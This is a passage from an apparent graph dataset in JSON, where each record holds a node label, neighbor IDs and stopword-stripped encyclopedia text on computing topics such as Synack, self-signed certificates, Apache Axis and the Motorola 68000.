    "text": "Synack:synack synack american technology company based redwood city california synack ’ business includes vulnerability intelligence platform automates discovery exploitable vulnerabilities reconnaissance turns company ’ freelance hackers create vulnerability reports clients synack founded 2013 former nsa agents jay kaplan mark kuhr synack uses network freelance security analysts hackers 50 countries check vulnerability security problems synack also developed hydra platform built spot vulnerabilities look out-of-date software clients first form hydra went live october 21 2015 april 24 2014 company announced secured series funding kleiner perkins caufield byers google ventures allegis capital derek smith shape security february 2015 company raised 25 million series b funding april 11 2017 reported synack raised 21 million microsoft ventures hewlett packard enterprise singtel prior investors ggv capital gv kleiner perkins caufield byers also took part funding round bringing total money raised company 55 million since founding april 11 2017 company 100 employees well growing network freelance hackers cnbc named synack cnbc disruptor company three times row 2015 2017",
    "neighbors": [
      10924,
      1764,
      1638,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 7258,
    "label": 3,
    "text": "Avnu_Alliance:avnu alliance avnu alliance consortium professional automotive consumer electronics industrial manufacturing companies working together establish certify interoperability open audio video bridging avb time-sensitive networking tsn standards alliance works member companies certify avb tsn products interoperability manufacturers may use avnu logo certified products every avb-compliant device submitted certification avnu alliance lack avnu logo necessarily imply device incompatible avnu-certified devices institute electrical electronics engineers ieee formed 1963 merger american institute electrical engineers founded 1884 institute radio engineers founded 1912 two organizations merged rise electronics many interests beginning overlap 1980 ieee started project 802 create standards local area network lan applications 1985 802.3 became official standard ethernet cable-based data transmission system originally developed xerox 1970s audio video bridging name given set technical standards developed ieee audio video bridging task group ieee 802.1 standards committee committee developed original technical standards avb way simplify audio video streaming use ethernet cable rather complicated approach traditionally taken using array analog one-way single-purpose point-to-point cables avnu alliance launched august 25 2009 create certification processes based avb standards would ensure interoperability founding members include broadcom cisco systems harman international intel xilinx august 2013 alliance includes 60 members worldwide represent cross-section companies 2012 avnu alliance announced formation avnu automotive avb gen2 council aaa2c committee automotive industry experts collectively identify automotive requirements future development second generation avb standards april 2013 forum launched avnu alliance broadcast advisory council aabac assess improve avb requirements broadcast industry created participation avnu alliance members network technologists broadcasters aabac also intends promote use avb broadcast applications avnu alliance chairman president rick kreifeldt harman international avnu alliance invites industry companies participate collaborate efforts improve audio/video quality members create broad array products including cars semiconductors loudspeakers consoles microphones 2012 avnu alliance created single set open standards avb uses certify devices guarantee interoperability since january 2012 avnu alliance worked test house university new hampshire interoperability laboratory unh-iol test interoperability provide validation certified products avnu certification testing officially began unh-iol february 2013 unh-iol neutral independent testing service works audio/video industry consortiums including ethernet alliance wi-fi alliance ipv6 forum provide third-party verification lower costs collaborative testing help guide industry acceptance technology standard technology ecosystem supporting accelerating development avnu certified products matured include standards-compliant silicon devices fpga ip open-source software also 3rd-party avb certification services coveloz avb certification service product submitted avnu alliance certification tested 400 pages conformance requirements combine ieee 802.1 standard requirements additional requirements developed avnu issues product may reported manufacturer fixing outstanding issues manufacturer submit product avnu official approval permission use avnu certification logo product accompanying marketing efforts february 2014 avnu alliance announced first certified products series avb switches extreme networks passed conformance tests bear avnu-certified logo extreme networks summit x440 series stackable switches extend benefits extremexos software intended professional av applications allowing data audio video co-exist single standards-based network avnu alliance goal make easier implement network systems promoting adoption ieee 802.1 1722 1733 avb standards automotive professional consumer electronics markets ensuring avb products different manufacturers would able interconnect seamlessly along ensuring interoperability adoption ieee 802.1 related ieee 1722 ieee 1733 avb standards various networks would reduce technical issues synching glitches delays improving content streaming capabilities alliance industry standards improved ethernet technology making simpler add enhanced performance capabilities audio/video networks bringing costs using lighter cheaper cable easier set able carry larger amount information regularly used networking environments 2018 avnu alliance announced milan initiative define implementation details media formats clocking redundancy device control provide certification testing program ensure devices different vendors interoperable within common device profiles milan specification based following ieee standards specification requires media clocking based ieee 1722 crf clock reference format sample rate 48 khz optionally 96 192 khz audio stream format based ieee 1722 32-bit standard aaf audio format 8 channels per stream optionally 24 32 bit high capacity format 56 64 channels redundancy providedcwith two independent logical networks every endpoint seamless switchover mechanism avdecc defines operations discover device addition removal retrieve device entity model connect disconnect streams manage device connection status remote control devices alliance members represent variety facets automotive technology growing complexity in-vehicle audio/video systems increasing number in-vehicle applications infotainment safety multiple cameras testing ensure interoperability increasingly important automotive market automotive systems multiple applications require interoperability work properly 2013 avnu alliance works genivi alliance jaspar alliance standardize in-vehicle ethernet requirements ieee avb task group developed series enhancements provide highly-reliable delivery low latency synchronized audio video technology enables construction affordable high performance professional media networks ieee avb task force developed improvements ethernet order improve audio/video networking avnu certifies avb products ensure interoperability video interoperability specifications pro market currently development meyer sound noted adopting avnu alliance ethernet standards assist development first avb-capable loudspeaker named cal stands column array loudspeaker completed 2013 improvements ethernet developed ieee avb task force also benefit desiring distribute digital content among multiple devices home networks 2013 avnu alliance began establish testing requirements avb interoperability specifications reliable time-synced av streaming ethernet wireless networks residential applications",
    "neighbors": [
      3441,
      6834,
      2948,
      5270
    ],
    "mask": "Test"
  },
  {
    "node_id": 7259,
    "label": 9,
    "text": "SASL_(programming_language):sasl programming language sasl st andrews static language alternatively st andrews standard language purely functional programming language developed david turner university st andrews 1972 based applicative subset iswim 1976 turner redesigned reimplemented non-strict lazy language form foundation turner later languages krc miranda sasl appears untyped whereas miranda polymorphic types burroughs corporation used sasl write compiler operating system",
    "neighbors": [
      9345,
      3876,
      8262,
      6160,
      2069,
      1333,
      1982
    ],
    "mask": "Test"
  },
  {
    "node_id": 7260,
    "label": 4,
    "text": "Location-based_authentication:location-based authentication location-based authentication special procedure prove individual identity authenticity appearance simply detecting presence distinct location enable location-based authentication special combination objects required basic requirement safe location-based authentication well defined separation locations well equally well defined proximity applying individual location offered technical solution simple location-based authentication includes method limiting granted access presence hence terminating granted authentication leave defines mandate either include new additional procedure",
    "neighbors": [
      1792,
      7268,
      5573,
      8838,
      9958,
      4912,
      10801,
      210,
      8210,
      10580,
      5433,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7261,
    "label": 8,
    "text": "Apache_Axis:apache axis apache axis apache extensible interaction system open-source xml based web service framework consists java c++ implementation soap server various utilities apis generating deploying web service applications using apache axis developers create interoperable distributed computing applications axis development takes place auspices apache software foundation using java version axis two ways expose java code web service easiest one use axis native jws java web service files another way use custom deployment custom deployment enables customize resources exposed web services see also apache axis2 jws files contain java class source code exposed web service main difference ordinary java file jws file file extension another difference jws files deployed source code compiled class files following example expose methods add subtract class calculator axis servlet deployed need copy jws file axis directory server work using apache tomcat container case using another web container custom war archive creation required jws web service accessible using url nowiki http //localhost:8080/axis/calculator.jws /nowiki running custom configuration apache tomcat different container url might different custom web service deployment requires specific deployment descriptor called wsdd web service deployment descriptor syntax used specify resources exposed web services current version 1.3 supports web service exposed using axis generate wsdl file automatically accessing web service url wsdl appended example implementing deploying simple web-service c++ version axis found axis-cpp tutorial link reference section steps necessary information individual steps go directly tutorial",
    "neighbors": [
      769,
      8070,
      10377,
      8460,
      7567,
      1296,
      1041,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      10020,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      4919,
      5047,
      6328,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      6862,
      4944,
      1363,
      8408,
      9179,
      990,
      479,
      8799,
      865,
      9441,
      10719,
      11105,
      5093,
      8294,
      11111,
      11235,
      8425,
      8810,
      747,
      5612,
      4593,
      2163,
      6774,
      7159,
      1913,
      1018,
      10877
    ],
    "mask": "Test"
  },
  {
    "node_id": 7262,
    "label": 9,
    "text": "Flapjax:flapjax flapjax programming language built atop javascript provides spreadsheet-like dataflow computation style functional reactive programming making easy create reactive web pages without burden callbacks potentially inconsistent mutation flapjax thought two ways either library use regular javascript programs new language compiler converts generic javascript either case resulting programs run regular web browser addition flapjax comes persistent storage simple api masks complexity using ajax along sharing access-control server data flapjax compiler written haskell",
    "neighbors": [
      4867,
      3876,
      3462,
      8262,
      2804,
      8116,
      1051
    ],
    "mask": "None"
  },
  {
    "node_id": 7263,
    "label": 3,
    "text": "Lexra:lexra lexra semiconductor intellectual property core company based waltham massachusetts founded 1997 began developing licensing semiconductor intellectual property cores implemented mips architecture except four unaligned load store lwl lwr swl swr instructions lexra implement instructions necessary good performance modern software silicon graphics owned patent originally granted mips computer systems inc. implementing unaligned loads stores risc processor lexra wish pay high license fee permission use patent lexra licensed soft cores unlike arm ltd time lexra probably first semiconductor intellectual property core company 1998 silicon graphics spun mips technologies inc. semiconductor ip licensing company would compete directly lexra mips technologies sued lexra claiming trademark infringement lexra claims compatibility mips i. lexra mips technologies settled dispute agreeing public statements lexra would clearly state implement unaligned loads stores 1999 mips technologies sued lexra time infringing patents unaligned loads stores though lexra processor designs implement unaligned loads stores possible emulate functionality unaligned loads stores long series instructions opinion lexra ability emulate function unaligned loads stores software predated grant patent question could viewed infringement hardware patent reasonable interpretation also much earlier mips technologies processor ibm mainframes supported unaligned memory operations earlier ibm processors unaligned memory operations partial access registers available microcode instruction set architecture aspects earlier ibm processors posed much greater threat patent invalidation mips technologies compared seemingly vacuous mips technologies infringement claim lexra protracted second lawsuit combined downturn semiconductor industry business forced lexra settlement mips technologies included mips technologies paying lexra large sum money granting lexra license technologies exchange lexra exiting ip business lexra failed networking communications fabless semiconductor chip company ceased operations january 2003 5.5 years lexra implemented ten processor designs licensed nine ip cores lexra first lexra also enhanced mips architecture extensions greatly enhanced performance digital signal processing dsp algorithms",
    "neighbors": [
      7234,
      10051,
      7173,
      426,
      6815,
      731,
      7071
    ],
    "mask": "None"
  },
  {
    "node_id": 7264,
    "label": 4,
    "text": "Self-signed_certificate:self-signed certificate cryptography computer security self-signed certificate identity certificate signed entity whose identity certifies term nothing identity person organization actually performed signing procedure technical terms self-signed certificate one signed private key typical public key infrastructure pki arrangements digital signature certificate authority ca attests particular public key certificate valid ca one root keys certificates associated public keys trust anchors use special type self-signed certificates establishing trust ca root certificate dependent upon procedures beyond checking digital signature ca based pki system ca must trusted parties usually accomplished placing ca certificates whitelist trusted certificates example web browsers developers may use procedures specified ca/browser forum private ca certificate may placed firmware embedded system trust issues entity accepting new self-signed certificate similar issues entity trusting addition new ca certificate parties self-signed pki must establish trust using procedures outside pki confirm accurate transfer public keys e.g compare hash band many subtle differences ca signed self-signed certificates especially amount trust placed security assertions certificate cas verify identity person issue certificate example us military issues common access cards person multiple forms id ca attest identity values like including signed certificate entity validates certificate trust information certificate extent trust ca signed implication security procedures ca used verify attested information self-signed certificate contrast trust values certificate complicated entity possesses signing key always generate new certificate different values example validity dates self-signed certificate might trusted entity could always create sign new certificate contained valid date range values self-signed certificate trusted following conditions true values out-of-band verified self-signed formally trusted method verify self-signed certificate changed trusted example procedure trusting self-signed certificate includes manual verification validity dates hash certificate incorporated white list certificate presented entity validate first verify hash certificate matches reference hash white-list match indicating self-signed certificate one formally trusted certificate validity dates trusted special treatment x.509 certificate fields self-signed certificate found rfc 3280 least two reasons self-signed certificate based pki may decreased overall risk first also shared private pki systems avoid problems trusting third parties may improperly sign certificates self-signed certificate transactions usually present far smaller attack surface eliminating complex certificate chain validation ca revocation checks like crl ocsp revocation self-signed certificates differs ca signed certificates self-signed certificate nature revoked ca revocation self-signed certificate accomplished removing whitelist trusted certificates essentially revoking trust ca failure revoke self-signed certificate may allow attacker already gained access monitor inject data connection spoof identity private key compromised cost self-signed certificates created free using wide variety tools including openssl java keytool adobe reader apple keychain certificates bought major cas often cost around hundred dollars per year december 2015 mozilla foundation launched let encrypt allows one obtain domain-validated certificate free speed deploy self-signed certificates require two parties interact e.g securely trade public keys using ca requires ca certificate holder interact holder public key validate authenticity ca root certificate customization self-signed certificates easier customize example larger key size contained data metadata etc",
    "neighbors": [
      513,
      517,
      1157,
      510,
      1288,
      7695,
      9744,
      1683,
      1688,
      3742,
      8094,
      2083,
      8358,
      11693,
      11569,
      9394,
      7736,
      9281,
      9412,
      3657,
      5834,
      461,
      10831,
      11345,
      2003,
      5590,
      474,
      3805,
      8674,
      7139,
      10341,
      5107,
      501,
      1526,
      2169,
      3707,
      2558,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 7265,
    "label": 4,
    "text": "Pre-play_attack:pre-play attack field security engineering pre-play attack cryptographic attack attacker prepares attack advance carrying simulated transaction pretending device attacked repeats attack second time real device time likely carry series operations simulation technique relies able guess content transaction advance something usually made possible poor choice unpredictability within system name play replay attack pre-play attacks effective chances success slim",
    "neighbors": [
      8694
    ],
    "mask": "Test"
  },
  {
    "node_id": 7266,
    "label": 2,
    "text": "Source_(command):source command codice_1 unix command evaluates file following command list commands executed current context frequently current context terminal window user typing commands interactive session source command abbreviated dot codice_2 bash similar posix-ish shells however acceptable c shell command first appeared bash scripts run using codice_3 syntax rather run executable command e.g. contain change directory codice_4 command user intends left directory script complete contain export command user wants modify environment current shell another usage situation script file execute permission passing script filename desired shell run script subshell current context",
    "neighbors": [
      9946,
      4850,
      7847
    ],
    "mask": "None"
  },
  {
    "node_id": 7267,
    "label": 9,
    "text": "CommonLoops:commonloops commonloops common lisp object-oriented programming system acronym reminiscent earlier lisp oo system loops interlisp-d system early programming language extended common lisp include object-oriented programming functionality dynamic object system differs oop facilities found static languages c++ java like new flavors commonloops supported multiple inheritance generic functions method combination commonloops also supported multi-methods made use metaobjects commonloops new flavors primary ancestors clos commonloops supported portable implementation known portable commonloops pcl ran common lisp implementations day",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      5677,
      3119,
      1591,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      2660,
      8293,
      3176,
      2666,
      2667,
      5751,
      7805,
      1159,
      9865,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      5384,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      11083,
      3408,
      6994,
      1365,
      2392,
      6493,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      2438,
      7562,
      5519,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      989,
      3051,
      5611,
      7670,
      11255,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 7268,
    "label": 4,
    "text": "Time-based_authentication:time-based authentication time-based authentication special procedure prove individual identity authenticity appearance simply detecting presence scheduled time day within scheduled time interval distinct location enable time-based authentication special combination objects required makes sense define starting time time span without constraints location granting access known without defining distinct location access shall granted basic requirement safe time based authentication well defined separation locations well equally well defined proximity applying individual location",
    "neighbors": [
      5433,
      7260,
      10801
    ],
    "mask": "Test"
  },
  {
    "node_id": 7269,
    "label": 3,
    "text": "Motorola_68000:motorola 68000 motorola 68000 'sixty-eight-thousand also called m68k motorola 68k sixty-eight-kay 16/32-bit cisc microprocessor introduced 1979 motorola semiconductor products sector design implements 32-bit instruction set 32-bit registers 32-bit internal data bus address bus 24-bits use memory segmentation made popular programmers internally uses 16-bit data alu two additional 16-bit alus used mostly addresses 16-bit external data bus reason motorola referred 16/32-bit processor one first widely available processors 32-bit instruction set running relatively high speeds era 68k popular design 1980s widely used new generation personal computers graphical user interfaces including apple macintosh commodore amiga atari st many others competed primarily intel 8088 found ibm pc easily outperformed 68k 8088 pushed designs like zilog z8000 niche markets made motorola major player cpu space 68k soon expanded additional family members implementing full 32-bit alus part growing motorola 68000 series original 68k generally software forward-compatible rest line despite limited 16-bit wide external bus 40 years production 68000 architecture still use motorola first widely-produced cpu motorola 6800 although capable design eclipsed powerful designs like zilog z80 less powerful faster designs like mos 6502 sales prospects 6800 dimmed motorola began totally new design replace became motorola advanced computer system silicon project macss begun 1976 macss aimed develop entirely new architecture without backward compatibility 6800 ultimately retain bus protocol compatibility mode existing 6800 peripheral devices version 8-bit data bus produced however designers mainly focused future forward compatibility gave 68000 design head start later 32-bit instruction set architectures instance cpu registers 32 bits wide though self-contained structures processor operate 32 bits time macss team drew heavily influence minicomputer processor design pdp-11 vax systems similarly microcode-based mid 1970s 8-bit microprocessor manufacturers raced introduce 16-bit generation national semiconductor first imp-16 pace processors 1973–1975 issues speed intel worked advanced 16/32-bit intel iapx 432 alias 8800 since 1975 intel 8086 since 1976 introduced 1978 became really widespread form almost identical 8088 ibm pc years later arriving late 16-bit arena afforded new processor transistors roughly 40,000 active versus 20,000 active 8086 32-bit macroinstructions acclaimed general ease use original mc68000 fabricated using hmos process 3.5 µm feature size formally introduced september 1979 initial samples released february 1980 production chips available counter november initial speed grades 4 6 8 mhz 10 mhz chips became available 1981 12.5 mhz chips june 1982 16.67 mhz 12f version mc68000 fastest version original hmos chip produced late 1980s 68k instruction set particularly well suited implement unix 68000 successors became dominant cpus unix-based workstations including sun workstations apollo/domain workstations 68000 also used mass-market computers apple lisa macintosh amiga atari st 68000 used microsoft xenix systems well early netware unix-based server 68000 used first generation desktop laser printers including original apple inc. laserwriter hp laserjet 1982 68000 received minor update isa support virtual memory conform popek goldberg virtualization requirements updated chip called 68010 also added new loop mode sped small loops increased overall performance 10 clock speeds extended version exposed 31 bits address bus also produced small quantities 68012 support lower-cost systems control applications smaller memory sizes motorola introduced 8-bit compatible mc68008 also 1982 68000 8-bit data bus smaller 20-bit address bus 1982 motorola devoted attention 68020 88000 projects several companies second-source manufacturers hmos 68000 included hitachi hd68000 shrank feature size 2.7 µm 12.5 mhz version mostek mk68000 rockwell r68000 signetics scn68000 thomson/sgs-thomson originally ef68000 later ts68000 toshiba tmp68000 toshiba also second-source maker cmos 68hc000 tmp68hc000 encrypted variants 68000 hitachi fd1089 fd1094 store decryption keys opcodes opcode data battery-backed memory used certain sega arcade systems including system 16 prevent piracy illegal bootleg games 68hc000 first cmos version 68000 designed hitachi jointly introduced 1985 motorola version called mc68hc000 hitachi hd68hc000 68hc000 eventually offered speeds 8–20 mhz except using cmos circuitry behaved identically hmos mc68000 change cmos greatly reduced power consumption original hmos mc68000 consumed around 1.35 watts ambient temperature 25 °c regardless clock speed mc68hc000 consumed 0.13 watts 8 mhz 0.38 watts 20 mhz unlike cmos circuits hmos still draws power idle power consumption varies little clock rate apple selected 68hc000 use macintosh portable motorola replaced mc68008 mc68hc001 1990 chip resembled 68hc000 respects data bus could operate either 16-bit 8-bit mode depending value input pin reset thus like 68008 could used systems cheaper 8-bit memories later evolution 68000 focused modern embedded control applications on-chip peripherals 68ec000 chip scm68000 core expanded address bus 32 bits removed m6800 peripheral bus excluded move sr instruction user mode programs 1996 motorola updated standalone core fully static circuitry drawing 2 µw low-power mode calling mc68sec000 motorola ceased production hmos mc68000 mc68008 1996 spin-off company freescale semiconductor still producing mc68hc000 mc68hc001 mc68ec000 mc68sec000 well mc68302 mc68306 microcontrollers later versions dragonball family 68000 architectural descendants 680x0 cpu32 coldfire families also still production recently sendai fab closure 68hc000 68020 68030 68882 parts discontinued leaving 68sec000 production succeeded true 32-bit microprocessors 68000 used core many microcontrollers 1989 motorola introduced mc68302 communications processor introduction 68000 first used high-priced systems including multiuser microcomputers like wicat 150 early alpha microsystems computers sage ii iv tandy trs-80 model 16 single-user workstations hewlett-packard hp 9000 series 200 systems first apollo/domain systems sun microsystems sun-1 corvus concept graphics terminals like digital equipment corporation vaxstation 100 silicon graphics iris 1000 1200 unix systems rapidly moved capable later generations 68k line remained popular market throughout 1980s mid-1980s falling production cost made 68000 viable use personal home computers starting apple lisa macintosh followed commodore amiga atari st sharp x68000 hand sinclair ql microcomputer commercially important utilisation 68008 along derivatives icl one per desk business terminal helix systems missouri united states designed extension swtpc ss-50 bus ss-64 produced systems built around 68008 processor adoption risc x86 displaced 68000 series desktop/workstation cpu processor found substantial use embedded applications early 1980s quantities 68000 cpus could purchased less 30 usd per part video game manufacturers used 68000 backbone many arcade games home game consoles atari food fight 1982 one first 68000-based arcade games others included sega system 16 capcom cp system cps-2 snk neo geo late 1980s 68000 inexpensive enough power home game consoles sega mega drive/genesis console also sega cd attachment sega cd system three cpus two 68000s 1993 multi-processor atari jaguar console used 68000 support chip although developers used primary processor due familiarity 1994 multi-processor sega saturn console used 68000 sound co-processor much mega drive/genesis uses z80 co-processor sound and/or purposes certain arcade games steel gunner others based namco system 2 use dual 68000 cpu configuration systems triple 68000 cpu configuration also exist galaxy force others based sega board along quad 68000 cpu configuration used jaleco one 68000 sound lower clock rate compared 68000 cpus games big run cisco heat fifth 68000 different clock rate compared 68000 cpus additionally used jaleco arcade game wild pilot i/o processing 68000 also saw great success embedded controller early 1981 laser printers imagen imprint-10 controlled external boards equipped 68000 first hp laserjet—introduced 1984—came built-in 8 mhz 68000 printer manufacturers adopted 68000 including apple introduction laserwriter 1985 first postscript laser printer 68000 continued widely used printers throughout rest 1980s persisting well 1990s low-end printers 68000 also saw success field industrial control systems among systems benefited 68000 derivative microprocessor families programmable logic controllers plcs manufactured allen-bradley texas instruments subsequently following acquisition division ti siemens users systems accept product obsolescence rate domestic users entirely likely despite installed 20 years ago many 68000-based controllers continue reliable service well 21st century number digital oscilloscopes 80s 68000 used waveform display processor models including lecroy 9400/9400a also use 68000 waveform math processor including addition subtraction multiplication division two waveforms/references/waveform memories digital oscilloscopes using 68000 including 9400/9400a also perform fft functions waveform 683xx microcontrollers based 68000 architecture used networking telecom equipment television set-top boxes laboratory medical instruments even handheld calculators mc68302 derivatives used many telecom products cisco 3com ascend marconi cyclades others past models palm pdas handspring visor used dragonball derivative 68000 alphasmart uses dragonball family later versions portable word processors texas instruments uses 68000 high-end graphing calculators ti-89 ti-92 series voyage 200 early versions used specialized microcontroller static 68ec000 core later versions use standard mc68sec000 processor modified version 68000 formed basis ibm xt/370 hardware emulator system 370 processor 68000 24-bit external address bus two byte-select signals replaced a0 24 lines therefore address 16 mb physical memory byte resolution address storage computation uses 32 bits internally however 8 high-order address bits ignored due physical lack device pins allows run software written logically flat 32-bit address space accessing 24-bit physical address space motorola intent internal 32-bit address space forward compatibility making feasible write 68000 software would take full advantage later 32-bit implementations 68000 instruction set however prevent programmers writing forward incompatible software 24-bit software discarded upper address byte used purposes addressing could fail 32-bit 68000 implementations example early pre-7.0 versions apple mac os used high byte memory-block master pointers hold flags locked purgeable later versions os moved flags nearby location apple began shipping computers 32-bit clean roms beginning release 1989 mac iici 68000 family stores multi-byte integers memory big-endian order cpu eight 32-bit general-purpose data registers d0-d7 eight address registers a0-a7 last address register stack pointer assemblers accept label sp equivalent a7 good number registers time many ways small enough allow 68000 respond quickly interrupts even worst case 8 data registers d0–d7 7 address registers a0–a6 needed saved 15 registers total yet large enough make calculations fast could done entirely within processor without keeping partial results memory note exception routine supervisor mode also save user stack pointer a7 would total 8 address registers however dual stack pointer a7 supervisor-mode a7 design 68000 makes normally unnecessary except task switch performed multitasking system two types registers mildly annoying times hard use practice reportedly allowed cpu designers achieve higher degree parallelism using auxiliary execution unit address registers 68000 comparison arithmetic logic operations set bit flags status register record results use later conditional jumps bit flags zero z carry c overflow v extend x negative n extend x flag deserves special mention separate carry flag permits extra bit arithmetic logic shift operations separated carry flow-of-control linkage designers attempted make assembly language orthogonal instructions divided operations address modes almost address modes available almost instructions 56 instructions minimum instruction size 16 bits many instructions addressing modes longer include additional address mode bits cpu later whole family implements two levels privilege user mode gives access everything except privileged instructions interrupt level controls supervisor privilege gives access everything interrupt always becomes supervisory supervisor bit stored status register visible user programs advantage system supervisor level separate stack pointer permits multitasking system use small stacks tasks designers allocate memory required hold stack frames maximum stack-up interrupts cpu recognizes seven interrupt levels levels 1 5 strictly prioritized higher-numbered interrupt always interrupt lower-numbered interrupt status register privileged instruction allows one set current minimum interrupt level blocking lower equal priority interrupts example interrupt level status register set 3 higher levels 4 7 cause exception level 7 level triggered non-maskable interrupt nmi level 1 interrupted higher level level 0 means interrupt level stored status register visible user-level programs hardware interrupts signalled cpu using three inputs encode highest pending interrupt priority separate encoder usually required encode interrupts though systems require three hardware interrupts possible connect interrupt signals directly encoded inputs cost additional software complexity interrupt controller simple 74ls148 priority encoder may part vlsi peripheral chip mc68901 multi-function peripheral used atari st range computers sharp x68000 also provided uart timer parallel i/o exception table interrupt vector table interrupt vector addresses fixed addresses 0 1023 permitting 256 32-bit vectors first vector reset consists two vectors namely starting stack address starting code address vectors 3 15 used report various errors bus error address error illegal instruction zero division chk chk2 vector privilege violation block privilege escalation reserved vectors became line 1010 emulator line 1111 emulator hardware breakpoint vector 24 starts real interrupts spurious interrupt hardware acknowledgement level 1 level 7 autovectors 16 trap vectors reserved vectors user defined vectors since minimum starting code address vector must always valid reset systems commonly included nonvolatile memory e.g rom starting address zero contain vectors bootstrap code however general purpose system desirable operating system able change vectors runtime often accomplished either pointing vectors rom jump table ram use bank switching allow rom replaced ram runtime 68000 meet popek goldberg virtualization requirements full processor virtualization single unprivileged instruction move sr allows user-mode software read-only access small amount privileged state 68000 also unable easily support virtual memory requires ability trap recover failed memory access 68000 provide bus error exception used trap save enough processor state resume faulted instruction operating system handled exception several companies succeed making 68000-based unix workstations virtual memory worked using two 68000 chips running parallel different phased clocks leading 68000 encountered bad memory access extra hardware would interrupt main 68000 prevent also encountering bad memory access interrupt routine would handle virtual memory functions restart leading 68000 correct state continue properly synchronized operation main 68000 returned interrupt problems fixed next major revision 68k architecture release mc68010 bus error address error exceptions push large amount internal state onto supervisor stack order facilitate recovery move sr instruction made privileged new unprivileged move ccr instruction provided use place user mode software operating system trap emulate user-mode move sr instructions desired standard addressing modes plus access status register later models special registers instructions dot-letter suffixes permitting operations occur 8-bit bytes .b 16-bit words .w 32-bit longs .l like many cpus era cycle timing instructions varied depending source operand example unsigned multiply instruction takes 38+2n clock cycles complete n equal number bits set operand create function took fixed cycle count required addition extra code multiply instruction would typically consume extra cycles bit n't set original multiplication operand instructions dyadic operation source destination destination changed notable instructions 68ec000 low-cost version 68000 slightly different pinout designed embedded controller applications 68ec000 either 8-bit 16-bit data bus switchable reset processors available variety speeds including 8 16 mhz configurations producing 2,100 4,376 dhrystones processors floating-point unit difficult implement fpu coprocessor mc68881/2 one ec series lacks necessary coprocessor instructions 68ec000 used controller many audio applications including ensoniq musical instruments sound cards part midi synthesizer ensoniq sound boards controller provided several advantages compared competitors without cpu board processor allowed board configured perform various audio tasks mpu-401 midi synthesis mt-32 emulation without use tsr program improved software compatibility lowered cpu usage eliminated host system memory usage motorola 68ec000 core later used m68k-based dragonball processors motorola/freescale also used sound controller sega saturn game console controller hp jetdirect ethernet controller boards mid-1990s laserjet printers 68000 assembly code subroutine named copies null-terminated string 8-bit characters destination string converting alphabetic characters lower case subroutine establishes call frame using register a6 frame pointer kind calling convention supports reentrant recursive code typically used languages like c c++ subroutine retrieves parameters passed stack loops reading ascii character single byte string checking whether capital alphabetic character converting lower-case character otherwise leaving writing character string finally checks whether character null character repeats loop otherwise restores previous stack frame a6 register returns note string pointers registers a0 a1 auto-incremented iteration loop contrast code stand-alone function even restrictive version ams ti-89 series calculators kernel-independent values looked tables files libraries executing system calls exception processing minimal registers used need save valid historical julian dates 1 march 1 ad gregorian ones less two dozen operations calculates day number compatible iso 8601 called three inputs stored corresponding locations",
    "neighbors": [
      7170,
      7173,
      8715,
      1548,
      9231,
      4114,
      7188,
      5141,
      6165,
      2073,
      10786,
      6187,
      10796,
      3630,
      4144,
      11314,
      1592,
      4152,
      8761,
      6715,
      10808,
      576,
      7235,
      8776,
      2638,
      5711,
      7772,
      5220,
      5736,
      8301,
      10862,
      11374,
      3185,
      7281,
      5235,
      3702,
      7286,
      7291,
      3708,
      3197,
      1660,
      2179,
      4228,
      6787,
      1158,
      7299,
      7302,
      7305,
      11405,
      5264,
      1170,
      11411,
      9366,
      7319,
      6296,
      3233,
      5629,
      4773,
      6821,
      3241,
      682,
      7849,
      2224,
      5297,
      5814,
      9911,
      11447,
      6329,
      10945,
      8898,
      8900,
      10436,
      9928,
      9932,
      5336,
      217,
      7916,
      9452,
      5358,
      9964,
      1776,
      6896,
      2290,
      8435,
      8944,
      6390,
      3319,
      9463,
      11513,
      2811,
      7939,
      3844,
      4868,
      1798,
      10501,
      5384,
      11011,
      6925,
      6415,
      1809,
      11539,
      7445,
      2327,
      1304,
      2839,
      5400,
      797,
      2334,
      8484,
      2345,
      4910,
      4409,
      2874,
      10051,
      10564,
      4424,
      8524,
      5455,
      336,
      5457,
      8530,
      3923,
      11604,
      9563,
      3932,
      8540,
      1376,
      3936,
      8544,
      1903,
      8048,
      4465,
      11123,
      5492,
      8058,
      9084,
      1405,
      5503,
      3457,
      11649,
      10627,
      3467,
      11153,
      921,
      7065,
      9633,
      8102,
      9638,
      10666,
      11690,
      8628,
      1461,
      9141,
      6075,
      1983,
      5569,
      5058,
      9665,
      10691,
      10692,
      966,
      4550,
      3017,
      5065,
      4046,
      5071,
      6607,
      9166,
      3540,
      4565,
      9685,
      1497,
      4569,
      1501,
      477,
      1502,
      5598,
      6624,
      2019,
      6116,
      10224,
      2547,
      2551,
      2553,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7270,
    "label": 3,
